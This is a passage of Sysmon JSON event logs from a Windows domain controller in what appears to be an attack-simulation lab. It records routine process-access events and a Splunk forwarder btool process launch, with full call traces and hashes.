C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3199,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3200,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3201,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3202,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001083250500}\r\nTargetProcessId: 4200\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.621","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001083250500}","TargetProcessId":"4200","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3203,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.627\r\nProcessGuid: {A837DB8D-0239-5F25-0000-00103F260500}\r\nProcessId: 4204\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001083250500}\r\nParentProcessId: 4200\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.627","ProcessGuid":"{A837DB8D-0239-5F25-0000-00103F260500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001083250500}","ParentProcessId":"4200","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3204,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001083250500}\r\nSourceProcessId: 4200\r\nSourceThreadId: 2856\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-00103F260500}\r\nTargetProcessId: 4204\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.621","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001083250500}","SourceProcessId":"4200","SourceThreadId":"2856","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-00103F260500}","TargetProcessId":"4204","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3205,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-00103F260500}\r\nTargetProcessId: 4204\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.621","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-00103F260500}","TargetProcessId":"4204","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3206,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3207,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 